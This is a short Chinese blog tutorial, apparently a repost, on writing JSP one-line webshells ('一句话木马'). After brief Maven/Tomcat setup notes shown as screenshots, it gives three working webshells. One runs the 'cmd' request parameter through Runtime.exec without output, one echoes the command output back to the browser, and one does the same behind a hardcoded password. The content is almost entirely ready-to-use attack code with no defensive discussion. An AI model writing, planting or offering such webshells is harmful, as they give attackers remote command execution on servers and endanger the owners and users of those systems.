jsp回显一句话木马
文章目录
- jsp回显一句话木马
- 一、搭建web服务
- 1、创建空白maven项目,搭建本地tomcat
- 2、引入servlet的pom依赖
- 二、无回显一句话
- 三、带回显一句话
- 三、有密码带回显一句话
提示:以下是本篇文章正文内容,下面案例可供参考
一、搭建web服务
1、创建空白maven项目,搭建本地tomcat
![图片[1] - java安全——jsp一句话木马 - MaxSSL](https://www.maxssl.com/uploads/?url=https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/9a66fd5a7c17421fafc8500b03d5fd6c.png)
![图片[2] - java安全——jsp一句话木马 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/60e11936bad143848dffd23460c86660.png)
2、引入servlet的pom依赖
![图片[3] - java安全——jsp一句话木马 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/61de753012f2449892106c5ea043d6c1.png)
二、无回显一句话
<%Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));%>http://localhost:8003/index.jsp” />
三、带回显一句话
代码如下(示例):
<%Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));String line;while ((line = bufferedReader.readLine()) != null){response.getWriter().println(line);}%>![图片[4] - java安全——jsp一句话木马 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/c49f3fabf14f4a02b701e19e7a4c45e1.png)
三、有密码带回显一句话
<%if ("password".equals(request.getParameter("pass"))){Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));String line;while ((line = bufferedReader.readLine()) != null){response.getWriter().println(line);}}%>![图片[5] - java安全——jsp一句话木马 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/de22b43c971e4decaa36deb952e6b489.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
